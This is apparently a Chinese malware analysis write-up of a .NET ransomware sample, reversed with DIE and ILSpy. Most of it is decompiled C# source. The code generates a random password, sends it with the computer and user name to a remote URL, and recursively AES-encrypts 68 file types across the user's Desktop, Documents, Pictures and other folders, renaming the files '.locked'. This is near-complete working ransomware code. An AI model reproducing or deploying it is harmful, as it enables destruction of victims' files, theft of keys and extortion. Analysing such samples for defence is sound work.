样本文件类型及其基本信息搜集
使用DIE分析
静态分析
ILSpy分析
ILSpy对.net的反编译有很好的支持
拖入打开,发现入口函数
接下来看这个Form1类
创建密码
public string CreatePassword(int length)
{
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
while (0 < length--)
{
stringBuilder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()"[random.Next("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()".Length)]);
}
return stringBuilder.ToString();
}发送密码
public void SendPassword(string password)
{
try
{
string text = "?computer_name=" + computerName + "&userName=" + userName + "&password=" + password + "&allow=ransom";
string address = targetURL + text;
string text2 = new WebClient().DownloadString(address);
}
catch (Exception)
{
}
}扫描目录加密
public void Directory_Settings_Sending(string password)
{
string text = "Users\\";
string location = userDir + text + userName + "\\Desktop";
string location2 = userDir + text + userName + "\\Links";
string location3 = userDir + text + userName + "\\Contacts";
string location4 = userDir + text + userName + "\\Desktop";
string location5 = userDir + text + userName + "\\Documents";
string location6 = userDir + text + userName + "\\Downloads";
string location7 = userDir + text + userName + "\\Pictures";
string location8 = userDir + text + userName + "\\Music";
string location9 = userDir + text + userName + "\\OneDrive";
string location10 = userDir + text + userName + "\\Saved Games";
string location11 = userDir + text + userName + "\\Favorites";
string location12 = userDir + text + userName + "\\Searches";
string location13 = userDir + text + userName + "\\Videos";
encryptDirectory(location, password);
encryptDirectory(location2, password);
encryptDirectory(location3, password);
encryptDirectory(location4, password);
encryptDirectory(location5, password);
encryptDirectory(location6, password);
encryptDirectory(location7, password);
encryptDirectory(location8, password);
encryptDirectory(location9, password);
encryptDirectory(location10, password);
encryptDirectory(location11, password);
encryptDirectory(location12, password);
encryptDirectory(location13, password);
}
public void encryptDirectory(string location, string password)
{
try
{
string[] source = new string[68]
{
".txt", ".jar", ".exe", ".dat", ".contact", ".settings", ".doc", ".docx", ".xls", ".xlsx",
".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".py", ".sql", ".mdb", ".sln",
".php", ".asp", ".aspx", ".html", ".htm", ".xml", ".psd", ".pdf", ".dll", ".c",
".cs", ".mp3", ".mp4", ".f3d", ".dwg", ".cpp", ".zip", ".rar", ".mov", ".rtf",
".bmp", ".mkv", ".avi", ".apk", ".lnk", ".iso", ".7-zip", ".ace", ".arj", ".bz2",
".cab", ".gzip", ".lzh", ".tar", ".uue", ".xz", ".z", ".001", ".mpeg", ".mp3",
".mpg", ".core", ".crproj", ".pdb", ".ico", ".pas", ".db", ".torrent"
};
string[] files = Directory.GetFiles(location);
string[] directories = Directory.GetDirectories(location);
for (int i = 0; i < files.Length; i++)
{
string extension = Path.GetExtension(files[i]);
if (source.Contains(extension))
{
EncryptFile(files[i], password);
}
}
for (int j = 0; j < directories.Length; j++)
{
encryptDirectory(directories[j], password);
}
}
catch (Exception)
{
// Exception handling logic goes here
}
}
public void EncryptFile(string file, string password)
{
// 读取文件内容
byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
// 将密码转换为字节
byte[] bytes = Encoding.UTF8.GetBytes(password);
// 计算密码的SHA256哈希值
bytes = SHA256.Create().ComputeHash(bytes);
// 使用AES加密文件内容
byte[] bytes2 = AES_Encrypt(bytesToBeEncrypted, bytes);
// 构建目标文件路径
string text = "Users\\";
string text2 = text + userName + "\\Desktop\\READ_IT.txt.locked";
string path = userDir + text2;
// 如果目标文件已存在,则删除
if (File.Exists(path))
{
File.Delete(path);
}
// 将加密后的内容写回原文件
File.WriteAllBytes(file, bytes2);
// 将原文件重命名为锁定文件
File.Move(file, file + ".locked");
}